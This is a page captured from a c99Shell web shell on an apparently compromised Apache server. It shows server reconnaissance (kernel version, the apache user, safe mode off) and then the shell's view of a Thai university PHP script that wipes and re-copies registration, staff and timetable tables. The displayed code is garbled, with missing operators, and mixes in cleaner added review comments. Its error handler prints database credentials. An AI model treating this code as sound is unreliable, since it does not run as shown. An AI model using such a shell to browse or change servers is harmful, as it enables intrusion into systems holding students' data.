!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess/admin/   drwxr-xr-x
Free 52.3 GB of 127.8 GB (40.92%)


Viewing file:     updateDBRegist.php (36.89 KB)      -rw-r--r--
<?php
include_once "template.php";
//showHeader();

//include_once "../link/function.php";

?>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">


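<?php
// Request intake for the "update registration data" admin page.
//function updateRegist(){

// Current academic year / semester as provided by the shared configuration.
$acadYear = $GLOBALS["ACADYEAR"];
$semester = $GLOBALS["SEMESTER"];

// Raw POST values. They are client-controlled, so they are never written back
// into the page without htmlspecialchars() (see the hidden fields below).
$method     = isset($_POST['method'])     ? (string) $_POST['method']     : '';
$formUpdate = isset($_POST['formUpdate']) ? (string) $_POST['formUpdate'] : '';
$nameTable  = isset($_POST['nameTable'])  ? (string) $_POST['nameTable']  : '';

// upTid is concatenated into SQL further down ("WHERE upTid = ..."), so it is
// forced to an integer at the point where it enters the script.
$uptid = isset($_POST['uptid']) ? (int) $_POST['uptid'] : 0;

// The page is served as TIS-620 (single-byte). Escaping with ISO-8859-1 is
// byte-preserving for such text: only the ASCII characters & < > " ' are
// rewritten, so Thai bytes pass through unchanged.
?>
<form name="formdata" method="post" action="<?php echo htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'ISO-8859-1'); ?>">
<input type="hidden" name="method" value="<?php echo htmlspecialchars($method, ENT_QUOTES, 'ISO-8859-1'); ?>">
<input type="hidden" name="formUpdate" value="<?php echo htmlspecialchars($formUpdate, ENT_QUOTES, 'ISO-8859-1'); ?>">
<input type="hidden" name="nameTable" value="<?php echo htmlspecialchars($nameTable, ENT_QUOTES, 'ISO-8859-1'); ?>">
<input type="hidden" name="uptid" value="<?php echo $uptid; ?>">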
<table  width='740'  align='center'  border="0" cellpadding="0" cellspacing="0">
<tr><td>
<fieldset>
        <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="index.php?mm=1">ข้อมูลพื้นฐานของระบบ</a> 
        <img src="../picture/ico3.gif" align="absmiddle" border="0">ปรับปรุงข้อมูลทะเบียนนักศึกษา.</font></legend>
<br>
    <table width="624" align="center" border="0" cellpadding="0" cellspacing="0" >
    <tr > 
      <td width="628" height="27" class="colinput1"> <div align="center"><strong>ปรับปรุงข้อมูลระบบทะเบียน</strong></div></tr>
    </table>
    <table width="624" border="0" align="center" cellspacing="1"  cellpadding="2" bgcolor = "silver">

<?php
    $ln_reg 
mysql_connect($GLOBALS['HOST'], $GLOBALS['USER_EASS'], $GLOBALS['PASSWORD_EASS']);
    if (!
$ln_reg) {
        echo 
"<font color='#FF0000'>$source_s";
        die(
' ไม่สามารถเชื่อมต่อฐานข้อมูลได้ ตรวจสอบชื่อ server, user และpassword ให้ถูกต้อง: ' mysql_error().'<br>'.$GLOBALS['HOST'].','$GLOBALS['USER_EASS'].','.$GLOBALS['PASSWORD_EASS']);
        echo 
"</font >";
    }else{
        
//echo "เชื่อมต่อฐานข้อมูล ";
        
$db_ass mysql_select_db($GLOBALS['DB_EASS'], $ln_reg);
        
//mysql_query("SET NAMES 'utf8'", $ln_info);
        
if ($db_ass) {
            
//echo ' สำเร็จ<br>';
?>
    <tr class="TableHeaderBgColor"> 
        <td height="22" align="center">ปรับปรุงข้อมูล</td>
        <td width="103" align="center">ปีการศึกษา</td>
        <td width="109" align="center">ภาคการศึกษา</td>
        <td align="center">วัน-เดือน-ปี / เวลา</td>
        <td align="center">ดำเนินการ</td>
    </tr>
<? 
        $oUT_sql 
"SELECT * FROM ".$GLOBALS['DB_EASS'].".UpdateTable LEFT JOIN ".$GLOBALS['DB_REGIST'].".rg_Term ON semester = tmId";
//echo $oUT_sql;
        
$db mysql_select_db($GLOBALS['DB_EASS'], $ln_reg);
        echo (
$db)?' ':'ไม่สามารถติดต่อฐานข้อมูล '.$GLOBALS['DB_EASS'];
        
$result mysql_query($oUT_sql);
//        echo mysql_num_rows($result);
            
$i=1;
            while (
$oUT mysql_fetch_object($result)) {
?>
   <? 
    $method 
$_POST["method"];
    if(
$method == "FormEdit$i"){ ?>
    <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_4"];?>" > 
      <td width="180" heigth = "22">&nbsp; <span class="fontMark2">*</span> <?echo $oUT->nameTable?></td>
        <td align="center">
            <? if($oUT->upTid == || $oUT->upTid == 5){?>
                <input name="inputAcadyear" type="text"  value = "<? echo $acadYear ?>" size="4" maxlength="4"  ><!-- onKeyPress="if((event.keyCode < 48 && event.keyCode !=  13) || event.keyCode > 57 ){ alert('กรอกได้เฉพาะตัวเลขเท่านั้น !!'); return false; }" -->
            <? }else{ 
                echo 
"<span class = \"fontMark4\">";
                if(
$oUT->acadYear == '0'){ echo "-"; }else{ echo $oUT->acadYear; }
                echo 
"</span>";
             } 
// end else oUT->upTid == 4?>
        </td>
        <td align="center"> 
            <? if($oUT->upTid == 4){  ?>
                <select name="selectSemester">
            <?php
                        $tm_sql 
"SELECT * FROM ".$GLOBALS['DB_REGIST'].".rg_Term";
                        
$tm_rs mysql_query($tm_sql,$ln_reg);

                        while (
$tm mysql_fetch_object($tm_rs)) {
                            if(
$tm->tmId == $semester){
echo 
"<option value=\"$tm->tmId\" selected>$tm->tmName</option>";
                                }else{
echo 
"<option value=\"$tm->tmId\">$tm->tmName</option>";
                                }
                            } 
// end while oSse ?>
                         </select> 
              <? } else { 
                     echo 
"<span class = \"fontMark4\">";
                        if(
$oUT->semester == '0' || $oUT->upTid == 5){ 
                            echo 
"-"
                        }else{  
                            echo 
$oUT->tmName;
                         }
                    echo 
"</span>";
                } 
// ?>

        </td>
        <td width="160" align="center"> 
        <? if($oUT->dateUp == '0000-00-00'){ 
                echo  
"-";
            }else{
                echo 
abbreDate2($oUT->dateUp,'/') ;
                echo 
"(".$oUT->timeUp.")";
            }
        
?>
        </td>
        <td width="80" align="center"> 
            <a href ="javascript:doFormMain(<? echo $i ?>,'<? echo $oUT->nameTable?>','<? echo $semester.'/'.$acadYear ?>')"><img src="../picture/save.gif" alt="บันทึกการอัพเดท" border="0" ></a> 
        </td>
    </tr>
    <? }else{  // for if method FormEdit ?>

      <tr class="colinput5"> 
         <td width="180" height = "22">&nbsp; <span class="fontMark2">*</span> <?echo $oUT->nameTable?></td>
          <td align="center"><? if($oUT->acadYear == '0'){ echo "-"; }else{ echo $oUT->acadYear; }?></td>
            <td align="center"><? if($oUT->semester == '0'){ 
                            echo 
"-"
                        }else{  
                            
//$oSse->SearchByKey($oUT->semester);  $oSse->GetRecord(); echo $oSse->semesterName;
                            
echo $oUT->tmName;
                     }
?>              <? //echo $oSse->semesterName; ?></td>
            <td width="160" align="center">
              <? if($oUT->dateUp == '0000-00-00'){ 
                        echo  
"-";
                   }else{
                        echo 
abbreDate2($oUT->dateUp,'/') ;
                        echo 
"(".$oUT->timeUp.")";
                    }
            
?>            </td>
            <td width="80" align="center"><a href ="javascript:doFormEdit(<? echo $i ?>)"><img src="../picture/edit1.gif" alt="แก้ไขการอัพเดท" border="0" ></a></td>
        </tr>
<?php
            
}
            
$i++;
            } 
//end while oUT

        
}else{
?>
        <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_4"];?>" > 
              <td width="180" height = "22" align='center' >
<?php
        
echo "<font color='#FF0000'>";
        echo 
"เชื่อมต่อฐานข้อมูลไม่สำเร็จ: " mysql_error();
        echo 
"</font>";
?>
        </td></tr>
<?php
        
}
    }
    
//    $numRows = mysql_num_rows($rsStd);
?>

    </table>
<table width="624" align="center" border="0">
  <tr>
    <td width="618"><font color="<?php echo $GLOBALS["COLOR_FONT_5"];?>" size="2"><u>คำแนะนำ</u> : ควรปรับปรุงข้อมูลหลังจากที่มีการเพิ่มถอนรายวิชาแล้ว </font>
    </td>
  </tr>
</table>
    <br>
<?php
    
    
// ------------  เงื่อนไขการปรับข้อมูล -------------------
    
$msgFlag 0;
    if(
$method == "FormStart"){
        
//set_time_limit(0);    
        
$flag 0;
        
$msgFlag  0;
    
/*-- update ข้อมูลนักศึกษา ทั้งหมด --*/
        
if($formUpdate == "FormStdMaster") {
            
$msgFlag =1;
            
$uptid 1;
// 1 StudentAssess = rg_StudentEduHis

            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".StudentAssess ;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                 
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".StudentAssess 
                (studentId,studentCode,levelName,programName,prefixName,studentName,studentSurname,studentPassword,studentYear) 
                SELECT stdId, stdCode, levelName, curName, prefixName, stdName, stdSurName, '' as pass, stdSyId
                FROM "
.$GLOBALS['DB_REGIST'].".rg_Student
                LEFT JOIN "
.$GLOBALS['DB_REGIST'].".rg_StudentEduHis ON sehStdId = stdId
                LEFT JOIN "
.$GLOBALS['DB_PPC'].".Level lv ON sehElvId = levelId
                LEFT JOIN "
.$GLOBALS['DB_REGIST'].".rg_Curriculum ON stdCurId = curId
                LEFT JOIN "
.$GLOBALS['DB_PPC'].".Prefix ON stdPfId = prefixId
                ORDER BY stdId;"
;
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }

    
/*-- update ข้อมูลอาจารย์ ทั้งหมด --*/
        
}elseif($formUpdate == "FormOfficer") {
            
$msgFlag =1;
            
$uptid 2;

// 1 OfficerAssess = rg_Person
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".OfficerAssess;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                
//die();
             
}else{
                 
// ดึงข้อมูลอาจารย์ประจำ
                 
$sql2 "INSERT INTO ".$GLOBALS['DB_EASS'].".OfficerAssess (officerId,officerCode,officerPassword,officerType
    ,prefixName,officerName,officerSurname,officerNameEng,officerSurnameEng,ofSitId,ofPicturePath )
    SELECT prsId, p.personCode, '', prsPtId, pf.prefixName
    , fName, lName, fName2, lName2, prsItId, pic
    FROM "
.$GLOBALS['DB_REGIST'].".rg_Person
    LEFT JOIN "
.$GLOBALS['DB_PPC'].".Person p ON prsUsId = p.personId
    LEFT JOIN "
.$GLOBALS['DB_PPC'].".PersonT pt ON prsUsId = pt.personId
    LEFT JOIN "
.$GLOBALS['DB_PPC'].".Prefix pf ON p.prefixId = pf.prefixId
    WHERE prsItId = 1 ;"
;
                
$result mysql_query($sql2,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด INSERT INTO : '.mysql_error().'<br /></span><br />'.$sql.'<br/><br/>'.$sql2;
                die();
                }

                 
// ดึงข้อมูลอาจารย์พิเศษ
                 
$sql3 "INSERT INTO ".$GLOBALS['DB_EASS'].".OfficerAssess (officerId,officerCode,officerPassword,officerType
    ,prefixName,officerName,officerSurname,officerNameEng,officerSurnameEng,ofSitId,ofPicturePath )
    SELECT prsId, NULL, '', prsPtId, pf.prefixName
    , fName, lName, '', '', prsItId, 'photo.jpg'
    FROM "
.$GLOBALS['DB_REGIST'].".rg_Person
    LEFT JOIN "
.$GLOBALS['DB_PPC'].".Personout p ON prsUsId = p.psoutId
    LEFT JOIN "
.$GLOBALS['DB_PPC'].".Prefix pf ON p.prefixId = pf.prefixId
    WHERE prsItId = 2 AND outtypeId = 3;"
;
                
$result mysql_query($sql3,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด INSERT INTO : '.mysql_error().'<br /></span><br />'.$sql.'<br/><br/>'.$sql2.'<br/><br/>'.$sql3;
                die();
                }
             }

// 2 ea_OFInDP = rg_PersonDepartment
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_OFInDP ;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                 
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_OFInDP (oidOfId,oidSeq,oidDpId,oidIsBoss,oidFrDate,oidToDate)
                    SELECT pdPrsId, pdSeq, pdDptId, pdIsBoss, pdFrDate, pdToDate
                    FROM "
.$GLOBALS['DB_REGIST'].".rg_PersonDepartment;";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }

// 3 ea_SysInstructorType = rg_InstructorType
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_SysInstructorType;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                 
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_SysInstructorType (sitId,sitName)
                    SELECT itId, itName
                    FROM "
.$GLOBALS['DB_REGIST'].".rg_InstructorType;";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }

// 4 ea_Department = rg_Department
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_Department;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_Department (dpId,dpName)
    SELECT dptId, dptName
    FROM "
.$GLOBALS['DB_REGIST'].".rg_Department";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }

        }elseif(
$formUpdate == "FormCourse") {
            
$msgFlag 1;
            
$uptid 3;
// CoursAssess = rg_Course
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".CourseAssess;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".CourseAssess (courseId,courseCode,courseCodeEng,courseName,courseNameEng
                ,creditTotal,credit1,credit2,period1,period2,period3,courseUnit)
                SELECT crsId, crsCode, crsCodeE, crsName, crsNameE
                , crsCreditTotal, crsCredit1, crsCredit2
                , crsPeriod1, crsPeriod2, crsPeriod3, crsUnit
                FROM "
.$GLOBALS['DB_REGIST'].".rg_Course
                ORDER BY CrsId"
;
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }

        }elseif(
$formUpdate == "FormReg") {
            
$msgFlag 1;
            
$uptid 4;
            
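// Both values come from the edit form and are concatenated, unquoted, into
// every DELETE/INSERT of this branch (acadYear = ..., coTmId = ...). Accept
// digits only and stop before any table is touched if they are anything else.
// NOTE(review): assumes the academic year and rg_Term.tmId are non-negative
// integer keys — confirm against the schema.
$inputAcadyear = isset($_POST["inputAcadyear"]) ? trim((string) $_POST["inputAcadyear"]) : '';
$selectSemester = isset($_POST["selectSemester"]) ? trim((string) $_POST["selectSemester"]) : '';
if (!ctype_digit($inputAcadyear) || !ctype_digit($selectSemester)) {
    $msgFlag = 2;
    echo '<span class="fontMark7">เกิดข้อผิดพลาด invalid inputAcadyear / selectSemester<br /></span>';
    die();
}
$inputAcadyear = (int) $inputAcadyear;
$selectSemester = (int) $selectSemester;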

// 1 ClassAssess = rg_CourseOpen
            //$sql = "DELETE FROM ".$GLOBALS['DB_EASS'].".ClassAssess;";
            
$sql 'DELETE FROM '.$GLOBALS['DB_EASS'].".ClassAssess WHERE acadYear = $inputAcadyear AND semester = $selectSemester ;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ClassAssess (classId,programId,acadYear,semester,studentYear
    ,courseId,sectionClass,section,totalSeat,enrollSeat,classTime,officerId)
    SELECT coId, coCurId, coAcY, coTmId, coSyId, coCrsId
    , coSectionClass, coSection, coNumSeatOpen, coNumSeatReg, '' as classTime, coPrsId
    FROM "
.$GLOBALS['DB_REGIST'].".rg_CourseOpen co
    WHERE coAcY = $inputAcadyear AND coTmId = $selectSemester
    GROUP BY coId;"
;
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                    echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                    die();
                }
             }

// 2 ClassOpenForAssess = rg_CourseOpenFor
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ClassOpenForAssess;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ClassOpenForAssess (classId,programId,bookSeat,erSeat)
    SELECT cofCoId, cofCurId, cofSeats, cofNumEnroll
    FROM "
.$GLOBALS['DB_REGIST'].".rg_CourseOpenFor;";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                    echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                    die();
                }
             }

// 3 ClassInStructorAssess = rg_TimeTable

            
$sql "DELETE cis from ".$GLOBALS['DB_EASS'].".ClassInStructorAssess cis INNER JOIN ".$GLOBALS['DB_EASS'].".ClassAssess cl ON cis.classId = cl.classId WHERE acadYear = $inputAcadyear AND semester = $selectSemester ";
//$sql = 'DELETE FROM '.$GLOBALS['DB_EASS'].'.ClassInStructorAssess ';
            
mysql_select_db($GLOBALS['DB_EASS'], $ln_reg);
            
$result mysql_query($sql);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด DELETE '.$GLOBALS['DB_EASS'].'.ClassInStructorAssess <br />QUERY : '.$sql.'<br />'.mysql_error().'<br /></span>';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ClassInStructorAssess (sequenceId,classId,officerId)
                    SELECT YEARWEEK( NOW( ) ) AS seq, ttCoId, ttPrsId
                    FROM "
.$GLOBALS['DB_REGIST'].".rg_TimeTable
                    INNER JOIN "
.$GLOBALS['DB_REGIST'].".rg_CourseOpen ON coId = ttCoId
                    WHERE coAcY = $inputAcadyear AND coTmId = $selectSemester
                    GROUP BY ttCoId, ttPrsId
                    ORDER BY ttCoId, ttPrsId "
;
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }

// 4 Registration (EnrollItem) = rg_RegisDetail
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".Registration
                    WHERE acadYear = $inputAcadyear AND semester = $selectSemester;"
;
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
mysql_error().'<br />';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".Registration
                (studentId,acadYear,semester,classId,courseId,creditAttempt)
                SELECT rdStdId, rdAcY, rdTmId, rdCoId, coCrsId, rdCreditAttempt
                FROM "
.$GLOBALS['DB_REGIST'].".rg_RegistDetails rd
                INNER JOIN "
.$GLOBALS['DB_REGIST'].".rg_CourseOpen ON rdCoId = coId
                WHERE rdAcY = $inputAcadyear AND rdTmId = $selectSemester
                ;"
;
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
mysql_error().'<br />';
                die();
                }
             }

// -- 5 ea_ExternalPlace = rg_ExternalPlace
// -- 6 ea_MainExternalPlace = rg_MainExternalPlace
// -- 7 ea_SubExternalPlace = rg_SubExternalPlace
            
            
$sql "SET foreign_key_checks = 0;";
            
$result mysql_query($sql,$ln_reg);
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_ExternalPlace;";
            
$result mysql_query($sql,$ln_reg);
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_MainExternalPlace;";
            
$result mysql_query($sql,$ln_reg);
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_SubExternalPlace;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_MainExternalPlace (mepId,mepName,mepPvId)
    SELECT mepId, mepName, mepPrvId
    FROM "
.$GLOBALS['DB_REGIST'].".rg_MainExternalPlace;";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                }
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_SubExternalPlace (sepId,sepName)
    SELECT sepId, sepName
    FROM "
.$GLOBALS['DB_REGIST'].".rg_SubExternalPlace;";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_ExternalPlace (epMepId,epSepId)
    SELECT etpMepId, etpSepId
    FROM "
.$GLOBALS['DB_REGIST'].".rg_ExternalPlace;";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }
 
// -- 8 WeekDateAssess." = rg_WeekDate
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".WeekDateAssess;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".WeekDateAssess (wdAcY,wdAcYWeekNo,wdTmId,wdTmWeekNo,wdFrDate,wdToDate)
                SELECT wdAcY,wdAcYWeekNo,wdTmId,wdTmWeekNo,wdFrDate,wdToDate
                FROM "
.$GLOBALS['DB_REGIST'].".rg_WeekDate;";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }
 
// -- 9 ea_Building = spc_Place
// -- 10 ea_Room = spc_Place
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_Room;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด DELETE ea_Room '.mysql_error().'<br /></span>';
                die();
             }

            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_Building;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด DELETE ea_Building'.mysql_error().'<br /></span>';
                die();
             }

            
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_Building (buildingId,buildingName)
                SELECT plHwId,hwName
                FROM "
.$GLOBALS['DB_PPC'].".spc_Place
                WHERE plRtId IS NULL  
                AND plBuilding IS NULL
                AND plIsDom = 'N'"
;
            
$result mysql_query($sql,$ln_reg);
            if(!
$result){
                
$msgFlag =2;
            echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
            die();
            }

            
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_Room (roomId,roomNo,buildingId,capacity)
                SELECT plHwId,plRmNo,plBuilding,plCapacity
                FROM "
.$GLOBALS['DB_PPC'].".spc_Place
                WHERE plIsRoom = 'Y'"
;
            
$result mysql_query($sql,$ln_reg);
            if(!
$result){
                
$msgFlag =2;
            echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
            die();
            }
            
$sql "SET foreign_key_checks = 1;";
            
$result mysql_query($sql,$ln_reg);
// -- 11 SysStudyTypeAssess = rg_StudyType
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".SysStudyTypeAssess;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".SysStudyTypeAssess (sstId,sstName,sstNameEng,sstAbbr,sstAbbrEng)
                SELECT stId, stName, stNameE, stAbbr, stAbbrE
                FROM "
.$GLOBALS['DB_REGIST'].".rg_StudyType";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }
 
// -- 12 TimeTableAssess = rg_TimeTable
            
$sql "DELETE ".$GLOBALS['DB_EASS'].".TimeTableAssess FROM ".$GLOBALS['DB_EASS'].".TimeTableAssess 
                    INNER JOIN "
.$GLOBALS['DB_EASS'].".ClassAssess  ON ttClId = classId 
                    WHERE acadYear = $inputAcadyear AND semester = $selectSemester
                    ;"
;

            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด DELETE TimeTableAssess<br />'$sql .'<br />'.mysql_error().'<br /></span>';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".TimeTableAssess (ttId,ttClId,ttWdAcYWeekNo,ttDyId,ttFrPr
                    ,ttToPr,ttOfId,ttSstId,ttTitle,ttRmId,ttEpMepId,ttEpSepId)
                    SELECT ttId,ttCoId,ttWdAcYWeekNo,ttDyId,ttPrdFrTime,ttPrdToTime
                    ,ttPrsId,ttStId,ttTitle,ttRmId,ttEtpMepId,ttEtpSepId
                    FROM "
.$GLOBALS['DB_REGIST'].".rg_TimeTable
                    INNER JOIN "
.$GLOBALS['DB_REGIST'].".rg_CourseOpen ON coId = ttCoId
                    WHERE coAcY = $inputAcadyear AND coTmId = $selectSemester
                    "
;

                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด INSERT TimeTableAssess<br />'.mysql_error().'<br /></span>';
                die();
                }
             }
            
$acadYear $inputAcadyear;
            
$semester $selectSemester ;
        }elseif(
$formUpdate == "FormEsa") { 
            
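$msgFlag = 1;
$uptid = 5;
// The statements below interpolate $inputAcadyear into SQL, but the only
// visible assignment of it is inside the FormReg branch. Here it is presumably
// filled in by register_globals, i.e. taken from the request unchecked. Read
// it explicitly and accept digits only before any DELETE runs.
// NOTE(review): assumes dpj_year / mb_year are integer columns — confirm.
$inputAcadyear = isset($_POST["inputAcadyear"]) ? trim((string) $_POST["inputAcadyear"]) : '';
if (!ctype_digit($inputAcadyear)) {
    $msgFlag = 2;
    echo '<span class="fontMark7">เกิดข้อผิดพลาด invalid inputAcadyear<br /></span>';
    die();
}
$inputAcadyear = (int) $inputAcadyear;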

// -- 1. `ea_SaDetailProject` = esa.`sa_detail_project`
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_SaDetailProject WHERE dpj_year = $inputAcadyear;";
            
$result mysql_query($sql,$ln_reg);
            if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
            }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_SaDetailProject 
                SELECT `dpj_id`, `dpj_mpj_id`, `dpj_sub_name`, `dpj_owner`
                , `dpj_seq`, `dpj_year`, `dpj_bgY`, `dpj_code`
                FROM "
.$GLOBALS['DB_ESA'].".`sa_detail_project`
                WHERE dpj_year = $inputAcadyear 
                    AND dpj_status = 2 "
;
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                    echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                    die();
                }
            }

// -- 2. ea_SaMember = esa.`sa_member`
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_SaMember WHERE mb_year = $inputAcadyear;";
            
$result mysql_query($sql,$ln_reg);
            if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
            }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_SaMember 
